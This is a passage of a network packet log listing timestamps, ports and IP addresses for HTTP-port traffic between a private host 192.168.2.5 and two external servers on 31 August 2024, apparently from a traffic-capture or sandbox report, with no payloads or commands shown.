Aug 31, 2024 15:44:20.611828089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.611838102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.611848116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.611859083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.611869097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.611871004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.611885071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.611912012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.611912012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612027884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612037897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612051010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612070084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612080097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612101078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612118006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612129927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612148046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612166882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612199068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612211943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612222910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612229109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612246990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612258911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612268925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612276077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612276077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612281084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612293005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612309933 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612312078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.612327099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612339020 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.612544060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.616065979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616164923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616174936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616185904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616197109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616208076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616219044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616228104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.616229057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616260052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.616293907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616307020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616317034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616327047 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.616328001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616347075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.616350889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616364002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616374969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616381884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.616385937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.616405010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.616538048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.617978096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.617990017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618001938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618012905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618022919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618033886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618038893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.618046045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618051052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.618051052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.618060112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618117094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.618117094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.618144035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618154049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618172884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618184090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618197918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.618199110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618211031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618222952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618230104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.618230104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.618232012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618243933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618256092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.618272066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.618272066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.620544910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.642604113 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.642616034 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.642679930 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.642688990 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.642688990 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.642741919 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.643927097 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.643938065 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.643949032 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.644006014 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.644006014 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.693294048 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.693305969 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.693317890 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.693350077 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.693404913 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.694331884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.694344997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.694355011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.694417953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.694417953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.694430113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.694442987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.694458961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.694469929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.694488049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.694488049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.694499969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.695498943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.695921898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.695935011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.695945978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696038961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696057081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696069002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696068048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.696079969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696091890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696100950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.696121931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.696537971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.696749926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696759939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696768999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696782112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696791887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696803093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696811914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.696811914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.696815968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696845055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.696899891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696911097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696922064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696929932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.696933985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696947098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696958065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696962118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.696970940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.696978092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697017908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697017908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697021008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697248936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697266102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697278023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697297096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697309017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697319031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697326899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697326899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697333097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697360992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697551966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697568893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697580099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697581053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697592020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697603941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697607994 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697613955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697627068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697633028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697640896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697652102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697657108 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697662115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697674036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697683096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697683096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697685003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697699070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697712898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697715998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697729111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697729111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697761059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697925091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697956085 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.697962999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697974920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.697997093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.698043108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698055029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698065996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698074102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.698079109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698093891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.698132038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.698132038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.698317051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698364973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698374987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698436022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698446989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698457956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698468924 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.698470116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698482990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.698499918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.698499918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.700560093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702378035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702431917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702440977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702470064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702472925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702481985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702496052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702506065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702517986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702533960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702533960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702578068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702578068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702702045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702714920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702724934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702804089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702816010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702832937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702835083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702847958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702860117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702864885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702912092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702912092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.702951908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702963114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702975035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702986002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.702996969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.703006983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.703006983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.703007936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.703022003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.703025103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.703069925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.703069925 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.706720114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.706754923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.706854105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.706864119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.706876040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.706887007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.706897974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.706907988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.706909895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.706928968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.706964970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.706964970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.707010031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.707022905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.707035065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.707045078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.707056999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.707062960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.707062960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.707067966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.707079887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.707082987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.707096100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.707315922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.708655119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708667994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708678007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708688974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708700895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708710909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.708712101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708724976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708736897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708759069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.708759069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.708792925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708802938 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.708806038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708827972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708839893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708857059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.708882093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708893061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708903074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.708910942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.708933115 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.709403992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.709435940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.710632086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.740869999 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.740881920 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.740892887 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.740973949 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.740973949 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.740998030 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.741123915 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.741153955 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.741245985 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.741255999 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.741307020 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.741307020 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.741858959 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.741871119 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.741880894 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.741903067 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.742033958 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.742064953 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.742316961 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.742347002 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.748541117 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.785012960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.785023928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.785033941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.785093069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.785099030 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.785099030 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.785104036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.785114050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.785124063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.785137892 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.785152912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.785334110 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.786612988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.786700010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.786711931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.786722898 CEST	80	49727	52.212.52.84	192.168.2.5
